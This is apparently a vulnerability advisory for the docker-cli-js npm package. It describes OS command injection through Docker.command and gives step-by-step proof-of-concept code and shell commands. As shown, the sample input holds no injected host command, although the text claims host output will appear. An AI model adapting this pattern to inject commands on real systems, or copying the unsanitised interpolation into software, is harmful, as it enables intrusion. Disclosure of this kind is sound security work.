Affected versions of this package are vulnerable to Arbitrary Code Execution. If the command parameter of the Docker.command method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.
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Create a file named
exploit.jswith the following content:var dockerCLI = require('docker-cli-js'); var DockerOptions = dockerCLI.Options; var Docker = dockerCLI.Docker; var docker = new Docker(); var userInput = "echo 'Hello from the container'"; docker.command(`exec container-test bash -c "${userInput}"`, function (err, data) { console.log('data = ', data); });
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In the same directory as
exploit.js, runnpm install docker-cli-js. -
Create a background Docker container named
container-test:docker run --name container-test -d ubuntu sleep 1000 -
Run
exploit.js:node exploit.js.
You should see the outputs of both the container and host system.